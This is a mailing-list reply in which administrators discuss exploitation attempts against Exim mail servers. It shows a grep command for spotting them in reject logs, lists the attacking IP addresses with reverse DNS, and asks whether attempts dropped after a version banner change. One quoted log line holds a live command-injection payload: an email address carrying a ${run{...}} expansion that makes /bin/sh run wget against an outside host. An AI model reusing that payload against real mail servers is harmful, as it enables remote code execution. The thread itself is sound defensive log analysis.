Re: Exim latest update reports to world as 4.89, which the world thinks is vulnerable.
Hi.
On Fri, Jun 21, 2019 at 06:36:20AM +1000, Andrew McGlashan wrote:
> On 21/6/19 5:52 am, Reco wrote:
> > Plain old grep is more than enough here. This one:
> >
> > grep 'run{' /var/log/exim4/reject*
> >
> > finds things like these:
> >
> > 2019-06-19 18:54:43 H=(service.com) [107.182.225.42]
> > F=<support@service.com> rejected RCPT
> > <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2fxxx.
> xxx.xxx.xxx\x22}}@localhost>:
> > Unrouteable address
>
> Okay:
> 21 attempts from 8 different IP addresses on one server
> 1 [163.172.157.143]
> 2 [188.138.0.205]
> 3 [23.129.64.152]
> 4 [23.129.64.193]
> 5 [27.69.172.214]
> 6 [45.55.94.254]
> 7 [51.15.227.108]
> 8 [89.248.171.57]
>
> 28 attempts on another server
> 1 [149.56.142.192]
> 2 [163.172.157.143]
> 3 [188.138.0.205]
> 4 [27.69.172.229]
> 5 [51.15.227.108]
> 6 [51.77.148.55]
> 7 [85.58.114.228]
> 8 [89.248.171.57]
>
> 17 attempts on another server
> 1 [188.138.0.205]
> 2 [89.248.171.57]
> 3 [98.158.184.125]
>
>
> 13 unique IP addresses so far.... (dig -x output)
>
> 1 149.56.142.192 192.ip-149-56-142.net.
> 2 163.172.157.143 143-157-172-163.rev.cloud.scaleway.com.
> 3 188.138.0.205 static-ip-188-138-0-205.inaddr.ip-pool.com.
> 4 23.129.64.152
> 5 23.129.64.193
> 6 27.69.172.214 localhost.
> 7 27.69.172.229 localhost.
> 8 45.55.94.254
> 9 51.15.227.108 108-227-15-51.rev.cloud.scaleway.com.
> 10 51.77.148.55 55.ip-51-77-148.eu.
> 11 85.58.114.228 228.pool85-58-114.dynamic.orange.es.
> 12 89.248.171.57 scanner20.openportstats.com.
> 13 98.158.184.125 206.217.215.125.static.midphase.com.
What I'm most interested is here is the time distribution.
I.e. has the number of exploitation attempts lowered after the Exim
banner change? Stayed the same?
Reco
Reply to: